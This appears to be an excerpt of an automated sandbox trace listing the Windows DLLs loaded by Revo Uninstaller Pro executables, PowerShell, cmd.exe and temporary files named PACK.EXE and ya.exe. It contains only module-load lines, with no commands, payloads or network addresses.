      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: ntasn1.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: msasn1.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: dwmapi.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: sspicli.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: winsta.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: windows.storage.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: wldp.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: kernel.appcore.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: windowscodecs.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: riched32.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: riched20.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: usp10.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: msls31.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: profapi.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: textshaping.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: textinputframework.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: coreuicomponents.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: coremessaging.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: ntmarta.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: coremessaging.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: wintypes.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: wintypes.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: wintypes.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: api-ms-win-core-synch-l1-2-0.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: api-ms-win-core-synch-l1-2-0.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: api-ms-win-core-localization-l1-2-1.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: version.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: dxgidebug.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: sfc_os.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: sspicli.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: rsaenh.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: uxtheme.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: dwmapi.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: cryptbase.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: riched20.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: usp10.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: msls31.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: kernel.appcore.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: dpapi.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: textshaping.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: textinputframework.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: coreuicomponents.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: coremessaging.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: ntmarta.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: coremessaging.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: wintypes.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: wintypes.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: wintypes.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: windows.storage.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: wldp.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: propsys.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: profapi.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: edputil.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: urlmon.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: iertutil.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: srvcli.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: netutils.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: windows.staterepositoryps.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: appresolver.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: bcp47langs.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: slc.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: userenv.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: sppc.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: onecorecommonproxystub.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: onecoreuapcommonproxystub.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: pcacli.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: mpr.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: apphelp.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: windows.fileexplorer.common.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: ntshrui.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: cscapi.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: linkinfo.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Section loaded: msasn1.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: version.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: mpr.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: olepro32.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wininet.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wsock32.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: winmm.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: iphlpapi.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: iphlpapi.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: mpr.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: oleacc.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: usp10.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: uxtheme.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: kernel.appcore.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wtsapi32.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: winsta.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: sxs.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: textshaping.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: textinputframework.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: coreuicomponents.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: coremessaging.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: ntmarta.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: coremessaging.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wintypes.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wintypes.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wintypes.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: dwmapi.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wbemcomn.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: napinsp.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: pnrpnsp.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wshbth.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: nlaapi.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: mswsock.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: dnsapi.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: winrnr.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: fwpuclnt.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: rasadhlp.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: amsi.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: userenv.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: profapi.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: napinsp.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: pnrpnsp.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wshbth.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: nlaapi.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: winrnr.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: fwpuclnt.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: sspicli.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: cryptsp.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: urlmon.dll
